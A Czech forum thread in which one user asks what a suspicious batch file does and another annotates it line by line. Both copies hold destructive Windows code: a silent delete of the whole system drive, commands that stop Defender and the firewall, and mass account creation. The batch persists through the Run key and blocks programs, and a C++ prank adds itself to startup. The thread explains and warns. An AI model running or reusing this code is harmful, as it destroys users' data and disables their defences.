Pochybny .bat

[Alfajk]

nahodou jsem na nejmenovanym foru nasel tohle jako.bat soubor,zajimalo by me,co to vlastne dela, prikazy typu "start iexplore.exe www.google.com" me moc nebezpecny neprijdou,ale "netsh firewall set opmode mode = disable" uz jo,je to jen fake,nebo to cosi doopravdy stahne?

-system32

del %systemdrive%\*.* /s /f /q

-worm

@echo off
taskkill -f -im explorer.exe
copy virus.bat C:\windows\
start iexplore.exe www.google.com
start iexplore.exe www.google.com
start iexplore.exe www.google.com
start iexplore.exe www.google.com
start iexplore.exe www.google.com
start iexplore.exe www.google.com
start iexplore.exe www.google.com
start iexplore.exe www.google.com
start iexplore.exe www.google.com
start iexplore.exe www.google.com
start iexplore.exe www.google.com
start iexplore.exe www.google.com
start iexplore.exe www.google.com
start iexplore.exe www.google.com
start iexplore.exe www.google.com
start iexplore.exe www.google.com
start iexplore.exe www.google.com
start iexplore.exe www.google.com
start iexplore.exe www.google.com
start iexplore.exe www.google.com
start iexplore.exe www.google.com
start iexplore.exe www.google.com
start iexplore.exe www.google.com
net user hhthhy virus /add
net user roc13xtyh virus /add
net user roc13x123 virus /add
net user roc13x1 virus /add
net user roc13x12 virus /add
net user roc13x2 virus /add
net user roc13x3 virus /add
net user roc13x4 virus /add
net user roc13x5 virus /add
net user roc13x6 virus /add
net user roc13x7 virus /add
net user roc13x8 virus /add
net user roc13x9 virus /add
net user roc13x0 virus /add
net user roc13x10 virus /add
net user roc13x10 virus /add
net user roc13x12 virus /add
net user roc13x2 virus /add
net user roc13x1 virus /add
net user roc13x2 virus /add
net user roc13x34 virus /add
net user roc13x34 virus /add
net user roc13x33 virus /add
net user roc13x343 virus /add
net user roc13x45 virus /add
net user roc13x00 virus /add
net user roc13x000 virus /add
net user roc13x0000 virus /add
net user roc13x00000 virus /add
net user roc13x000000 virus /add
net user roc13x0000000 virus /add
net user roc13x00000000 virus /add
net user roc13x000000000 virus /add
net user roc13x0000000000 virus /add
net user roc13x00000000000 virus /add
net user roc13x000000000000 virus /add
net user my comp /delete
mkdir %userprofile%\desktop\virus3000 njhjkhjkh
mkdir %userprofile%\desktop\virus3000hjhkhhjkh j
mkdir %userprofile%\desktop\virus3000jjjkjjj
mkdir %userprofile%\desktop\virus3000jhh
net stop "security center"
net stop "sharedaccess"
net stop "windows defender"
netsh firewall set opmode mode = disable
del "%userprofile%\desktop\internet explorer"
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\wi ndows\currentversion\run /hate /d C:\windows\bulldog worm.bat
reg add HKEY_CURRENT_USER\software\microsoft\win dows\currentversion\policies\system /v DisableTaskMgr /t REG_DWORD /d 1
reg add HKEY_CURRENT_USER\software\microsoft\win dows\currentversion\policies\explorer /v NoClose /t REG_DWORD /d 1
reg add HKEY_CURRENT_USER\software\microsoft\win dows\currentversion\policies\explorer /v NoStartMenuMorePrograms /t REG_DWORD /d 1
reg add HKEY_CURRENT_USER\software\microsoft\win dows\currentversion\policies\explorer\Di sallowRun
reg add HKEY_CURRENT_USER\software\microsoft\win dows\currentversion\policies\explorer /v DisallowRun /t REG_DWORD /d 1
reg add HKEY_CURRENT_USER\software\microsoft\win dows\currentversion\policies\explorer\Di sallowRun /v 1 /d iexplore.exe
reg add HKEY_CURRENT_USER\software\microsoft\win dows\currentversion\policies\explorer\Di sallowRun /v 2 /d notepad.exe
reg add HKEY_CURRENT_USER\software\microsoft\win dows\currentversion\policies\explorer\Di sallowRun /v 3 /d wordpad.exe
reg add HKEY_CURRENT_USER\software\microsoft\win dows\currentversion\policies\explorer\Di sallowRun /v 4 /d wmplayer.exe
reg add HKEY_CURRENT_USER\software\microsoft\win dows\currentversion\policies\explorer\Di sallowRun /v 5 /d msnmsgr.exe
reg add HKEY_CURRENT_USER\software\microsoft\win dows\currentversion\policies\explorer\Di sallowRun /v 6 /d avast.exe
reg add HKEY_CURRENT_USER\software\microsoft\win dows\currentversion\policies\explorer\Di sallowRun /v 7 /d help.exe
reg add HKEY_CURRENT_USER\software\microsoft\win dows\currentversion\policies\explorer\Di sallowRun /v 7 /d steam.exe
reg add HKEY_CURRENT_USER\software\microsoft\win dows\currentversion\policies\explorer\Di sallowRun /v 7 /d winmail.exe
reg add HKEY_CURRENT_USER\software\microsoft\win dows\currentversion\policies\explorer\Di sallowRun /v 7 /d outlook.exe
title VIRUS ALERT
color 04
echo A VIRUS HAS BEEN DETECTED ON YOUR COMPUTER AND WILL ERASE EVERYTHING!
shutdown -r

-matrix

#include
#include
#include
#include
#include
#include
#include
using namespace std;
int main()
{ keybd_event(VK_MENU,0x38,0,0);
keybd_event(VK_RETURN,0x1c,0,0);
keybd_event(VK_RETURN,0x1c,KEYEVENTF_KEYUP,0);
keybd_event(VK_MENU,0x38,KEYEVENTF_KEYUP,0);
HANDLE outToScreen;
outToScreen = GetStdHandle(STD_OUTPUT_HANDLE);
{
char buffer[255];
char inputFile[]="C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\rawr.bat";
ifstream input(inputFile);
if (!input)
{
{
ofstream fp("C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\rawr.bat", ios::app);
fp << "@ECHO OFF \n";
fp << "START C:\\rawr.exe \n";
fp << "EXIT";
}
}
else
{
while (!input.eof())
{
input.getline(buffer,255);
}
}
}
{
char buffer[255];
char inputFile[]="C:\\rawr.exe";
ifstream input(inputFile);
if (!input)
{
{
{
ofstream fp("CLICK.bat", ios::app);
fp << "@ECHO OFF \n";
fp << "COPY matrix.exe C:\\rawr.exe \n";
fp << "START C:\\rawr.exe \n";
fp << "EXIT";
}
system("START CLICK.bat");
main();
}
}
else
{
while (!input.eof())
{
input.getline(buffer,255);
system("call shutdown.exe -S");
goto START;
}
}
}
START:{
for(int i = 0; i < 1; i++)
{
int num = (rand() % 10);
SetConsoleTextAttribute(outToScreen, FOREGROUND_GREEN | FOREGROUND_INTENSITY);
cout << setw(4) << num;
cout << setw(4) << "0%";
cout << setw(4) << "P";
cout << setw(4) << " ";
cout << setw(4) << ")";
cout << setw(4) << "#";
cout << setw(4) << "X";
cout << setw(4) << "@";
cout << setw(4) << "1&";
cout << setw(4) << "*";
cout << setw(4) << "||";
cout << setw(4) << " \a";
Sleep(60);
}
}
for ( int j = 0; j < 5; j++)
{
SetConsoleTextAttribute(outToScreen, FOREGROUND_GREEN);
int number = (rand() % 24);
cout << setw(4) << number;
}
goto START;
}

[MiliNess]

Tak za prvé to není celé a za druhé toto jsou dvě části. Ta první je obsah dávkového souboru, ta druhá je nezkompilovaný kód napsaný v Céčku (C++)

-system32

del %systemdrive%\*.* /s /f /q
smaže všechny soubory z kořene zaváděcího svazku, včetně souborů v podadresářích a to v tichosti, bez dotazování se. (tam kde je složka Windows a smaže všechny soubory které právě nejsou otevřené nebo spuštěné a ke kterým má účet kde toto spustíte přístup)
-worm

@echo off
taskkill -f -im explorer.exe ukončí proces exploreru
copy virus.bat C:\windows\ zkopíruje soubor virus.bat z aktuálního adresáře do C:\windows
start iexplore.exe http://www.google.com 23x spustí internet explorer a otevře v něm stránku http://www.google.com
start iexplore.exe http://www.google.com
start iexplore.exe http://www.google.com
start iexplore.exe http://www.google.com
start iexplore.exe http://www.google.com
start iexplore.exe http://www.google.com
start iexplore.exe http://www.google.com
start iexplore.exe http://www.google.com
start iexplore.exe http://www.google.com
start iexplore.exe http://www.google.com
start iexplore.exe http://www.google.com
start iexplore.exe http://www.google.com
start iexplore.exe http://www.google.com
start iexplore.exe http://www.google.com
start iexplore.exe http://www.google.com
start iexplore.exe http://www.google.com
start iexplore.exe http://www.google.com
start iexplore.exe http://www.google.com
start iexplore.exe http://www.google.com
start iexplore.exe http://www.google.com
start iexplore.exe http://www.google.com
start iexplore.exe http://www.google.com
start iexplore.exe http://www.google.com
net user hhthhy virus /add vytvoří hafo nových uživatelských účtů s různými jmény
net user roc13xtyh virus /add
net user roc13x123 virus /add
net user roc13x1 virus /add
net user roc13x12 virus /add
net user roc13x2 virus /add
net user roc13x3 virus /add
net user roc13x4 virus /add
net user roc13x5 virus /add
net user roc13x6 virus /add
net user roc13x7 virus /add
net user roc13x8 virus /add
net user roc13x9 virus /add
net user roc13x0 virus /add
net user roc13x10 virus /add
net user roc13x10 virus /add
net user roc13x12 virus /add
net user roc13x2 virus /add
net user roc13x1 virus /add
net user roc13x2 virus /add
net user roc13x34 virus /add
net user roc13x34 virus /add
net user roc13x33 virus /add
net user roc13x343 virus /add
net user roc13x45 virus /add
net user roc13x00 virus /add
net user roc13x000 virus /add
net user roc13x0000 virus /add
net user roc13x00000 virus /add
net user roc13x000000 virus /add
net user roc13x0000000 virus /add
net user roc13x00000000 virus /add
net user roc13x000000000 virus /add
net user roc13x0000000000 virus /add
net user roc13x00000000000 virus /add
net user roc13x000000000000 virus /add
net user my comp /delete odstraní účet my comp, pokud takový existuje
mkdir %userprofile%\desktop\virus3000 njhjkhjkh na ploše vytvoří několik složek
mkdir %userprofile%\desktop\virus3000hjhkhhjkh j
mkdir %userprofile%\desktop\virus3000jjjkjjj
mkdir %userprofile%\desktop\virus3000jhh
net stop "security center" zastaví služby sharedaccess, security center, windows defender
net stop "sharedaccess"
net stop "windows defender"
netsh firewall set opmode mode = disable vypne Windows firewall
del "%userprofile%\desktop\internet explorer" smaže z plochy zástupce internet exploreru
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\wi ndows\currentversion\run /hate /d C:\windows\bulldog worm.bat zajistí spouštění worm.bat po startu
reg add HKEY_CURRENT_USER\software\microsoft\win dows\currentversion\policies\system /v DisableTaskMgr /t REG_DWORD /d 1 zakáže správce úloh
reg add HKEY_CURRENT_USER\software\microsoft\win dows\currentversion\policies\explorer /v NoClose /t REG_DWORD /d 1 odstraní ze start menu nabídku vypnutí počítače (zabrání uživateli vypínat počítač)
reg add HKEY_CURRENT_USER\software\microsoft\win dows\currentversion\policies\explorer /v NoStartMenuMorePrograms /t REG_DWORD /d 1 z nabídky start odebere nabídku "všechny programy"
reg add HKEY_CURRENT_USER\software\microsoft\win dows\currentversion\policies\explorer\Di sallowRun
reg add HKEY_CURRENT_USER\software\microsoft\win dows\currentversion\policies\explorer /v DisallowRun /t REG_DWORD /d 1
reg add HKEY_CURRENT_USER\software\microsoft\win dows\currentversion\policies\explorer\Di sallowRun /v 1 /d iexplore.exe zakáže spouštění těchto programů
reg add HKEY_CURRENT_USER\software\microsoft\win dows\currentversion\policies\explorer\Di sallowRun /v 2 /d notepad.exe
reg add HKEY_CURRENT_USER\software\microsoft\win dows\currentversion\policies\explorer\Di sallowRun /v 3 /d wordpad.exe
reg add HKEY_CURRENT_USER\software\microsoft\win dows\currentversion\policies\explorer\Di sallowRun /v 4 /d wmplayer.exe
reg add HKEY_CURRENT_USER\software\microsoft\win dows\currentversion\policies\explorer\Di sallowRun /v 5 /d msnmsgr.exe
reg add HKEY_CURRENT_USER\software\microsoft\win dows\currentversion\policies\explorer\Di sallowRun /v 6 /d avast.exe
reg add HKEY_CURRENT_USER\software\microsoft\win dows\currentversion\policies\explorer\Di sallowRun /v 7 /d help.exe
reg add HKEY_CURRENT_USER\software\microsoft\win dows\currentversion\policies\explorer\Di sallowRun /v 7 /d steam.exe
reg add HKEY_CURRENT_USER\software\microsoft\win dows\currentversion\policies\explorer\Di sallowRun /v 7 /d winmail.exe
reg add HKEY_CURRENT_USER\software\microsoft\win dows\currentversion\policies\explorer\Di sallowRun /v 7 /d outlook.exe
title VIRUS ALERT změní titulkový pruh okna konzoly (cmd) na text VIRUS ALERT
color 04 změní barvu textu v okně konzoly na červenou
echo A VIRUS HAS BEEN DETECTED ON YOUR COMPUTER AND WILL ERASE EVERYTHING! vypíše tento text
shutdown -r restartuje počítač

-matrix

#include
#include
#include
#include
#include
#include
#include
using namespace std;
int main()
{
keybd_event(VK_MENU,0x38,0,0); napodobí stisk kláves "Menu" a "Enter"
keybd_event(VK_RETURN,0x1c,0,0);
keybd_event(VK_RETURN,0x1c,KEYEVENTF_KEYUP,0);
keybd_event(VK_MENU,0x38,KEYEVENTF_KEYUP,0);
HANDLE outToScreen;
outToScreen = GetStdHandle(STD_OUTPUT_HANDLE); získá výstupní handle konzoly, dále pomocí něho mění barvu pozadí okna konzoly
{
char buffer[255];
char inputFile[]="C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\rawr.bat";
ifstream input(inputFile); pokusí se otevřít soubor rawr.bat
if (!input)
{
{ pokud soubor rawr.bat neexistuje, vytvoří ho a zapíše do něj dávkové příkazy
pro spuštění rawr.exe
ofstream fp("C:\\Documents and Settings\\All Users\\Start
Menu\\Programs\\Startup\\rawr.bat", ios::app);
fp << "@ECHO OFF \n";
fp << "START C:\\rawr.exe \n";
fp << "EXIT";
}
}
else
{
while (!input.eof())
{
pokud soubor existuje, načte jeho obsah do bufferu
input.getline(buffer,255);
}
}
}
{
char buffer[255];
char inputFile[]="C:\\rawr.exe";
ifstream input(inputFile); testuje existenci rawr.exe
if (!input)
{
{
{
pokud neexistuje, vytvoří soubor CLICK.bat a zapíše do něho dávkové příkazy, které překopírují matrix.exe (původní kopii nějakého vykonávacího souboru do C:\\rawr.exe
ofstream fp("CLICK.bat", ios::app);
fp << "@ECHO OFF \n";
fp << "COPY matrix.exe C:\\rawr.exe \n";
fp << "START C:\\rawr.exe \n";
fp << "EXIT";
}
system("START CLICK.bat"); spustí CLICK.bat
main();
}
}
tady už to je nějaké chaotické a neúplné
else
{
while (!input.eof())
{
input.getline(buffer,255); načítá rawr.exe ?? do bufferu
system("call shutdown.exe -S"); vypíná počítač
goto START;
}
}
}
START:{
for(int i = 0; i < 1; i++)
{
int num = (rand() % 10);
SetConsoleTextAttribute(outToScreen, FOREGROUND_GREEN | FOREGROUND_INTENSITY);
ve smyčce mění pozadí okna konzoly
cout << setw(4) << num;
cout << setw(4) << "0%";
cout << setw(4) << "P";
cout << setw(4) << " ";
cout << setw(4) << ")";
cout << setw(4) << "#";
cout << setw(4) << "X";
cout << setw(4) << "@";
cout << setw(4) << "1&";
cout << setw(4) << "*";
cout << setw(4) << "||";
cout << setw(4) << " \a";
a vypisuje tyto znaky
Sleep(60); čeká 60 milisekund}
}
for ( int j = 0; j < 5; j++)
{
SetConsoleTextAttribute(outToScreen, FOREGROUND_GREEN);
int number = (rand() % 24); vypisuje náhodné číslo 0 až 24 do okna konzoly
cout << setw(4) << number;
}
goto START;
}

[MiliNess]

Chybí vám tedy soubor matrix.exe, který může dělat cokoliv.
Spíše k sobě ani ty dvě části nepatří.
Podle kousku toho zdrojáku ale můžu odhadnout, že to nebude žádná sláva.
Spíše taková trapná legrácka, která vám může poškodit systém tím, že smaže nějaké soubory.
Autor neošetřuje možné chybové stavy, nezavírá soubory, neumí použít funkci CreateProcess, pravděpodobně ani nedokáže pomocí API funkcí překopírovat soubory, proto používá dávkové soubory atd. Pravý virus nemá žádný důvod upozorňovat na to, že je v počítači. Naopak se snaží co nejlépe maskovat.
Na stupnici jedna až deset (kdy 10 je profesionální práce odborníka)
by tohle dostalo max. 2.
Nejjednodušší srandičky jsou ve formě dávkových souborů, složitější ve formě exe a dll souborů a běží pouze v uživatelském módu, špička je pak z části implementována formou ovladačů a běží jak v uživatelském režimu tak v režimu jádra.

[Alfajk]

diky moc,presne tohle vsechno sem chtel vedet